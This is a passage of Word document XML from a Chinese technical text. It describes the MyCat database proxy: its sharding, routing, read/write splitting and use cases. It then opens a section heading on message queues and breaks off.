          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>用户</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>可以把它看成是一个数据库代理，用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Mysql</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>客户端工具和命令行访问，而其</w:t>
      </w:r>
      <w:r w:rsidRPr="00C160BF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>后端</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>可以用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>MySql</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>原生协议与多个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Mysql</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>服务器通信，可以用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>JDBC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>协议</w:t>
      </w:r>
      <w:r w:rsidR="002C272C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>与大多数主流数据库服务器通信，其核心功能是分库分表，即将一个大表</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>水平分割成</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>N</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>个小表，存储在后端</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Mysql</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>服务器里或者其他数据库里。</w:t>
      </w:r>
      <w:r w:rsidR="00C160BF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>后端可以支持</w:t>
      </w:r>
      <w:r w:rsidR="00C160BF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>MySQL</w:t>
      </w:r>
      <w:r w:rsidR="00C160BF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidR="00C160BF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>SQL Server</w:t>
      </w:r>
      <w:r w:rsidR="00C160BF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidR="00C160BF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Oracle</w:t>
      </w:r>
      <w:r w:rsidR="00C160BF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidR="00C160BF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>DB2</w:t>
      </w:r>
      <w:r w:rsidR="00C160BF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidR="00C160BF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>MongoDB</w:t>
      </w:r>
      <w:r w:rsidR="00C160BF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>等。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B5FCF" w:rsidRDefault="004B5FCF" w:rsidP="008B4EE5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:tab/>
        <w:t>MyCat</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>拦截了用户发送过来的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>SQL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>语句，首先对</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>SQL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>语句做了一些特定的分析：如分片分析、路由分析、读写分离分析、缓存分析，然后将</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>SQL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>发往后端真实数据库，并将返回结果进行处理，最终再返回给用户。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D76D20" w:rsidRDefault="00D76D20" w:rsidP="008B4EE5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>适用场景：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> (1)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>单纯读写分析，支持读写分离，主从切换</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D76D20" w:rsidRDefault="00D76D20" w:rsidP="008B4EE5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">  (2)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>分开分表，对于超过</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>1000</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>万的表进行分片，最大支持</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>1000</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>亿的单标分片</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D76D20" w:rsidRDefault="00D76D20" w:rsidP="008B4EE5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">(3) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>多租户应用，每个应用一个库，但应用程序只连接</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Mycat</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>，从而不改造程序</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">                  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:tab/>
        <w:t>(4)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>海量数据查找方案</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D76D20" w:rsidRDefault="00D76D20" w:rsidP="008B4EE5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5274310" cy="3713436"/>
            <wp:effectExtent l="19050" t="0" r="2540" b="0"/>
            <wp:docPr id="28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0" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5274310" cy="3713436"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00431CD8" w:rsidRPr="00D76D20" w:rsidRDefault="00431CD8" w:rsidP="008B4EE5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005B51E9" w:rsidRPr="00F41A4C" w:rsidRDefault="005B51E9" w:rsidP="005B51E9">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">9 </w:t>
      </w:r>
      <w:r w:rsidR="00192BE2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>消息队列</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0043203A" w:rsidRDefault="0043203A" w:rsidP="0043203A">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>9</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>消息队列</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0043203A" w:rsidRDefault="0043203A" w:rsidP="00893284">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005B51E9" w:rsidRPr="00F41A4C" w:rsidRDefault="005B51E9" w:rsidP="00893284">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
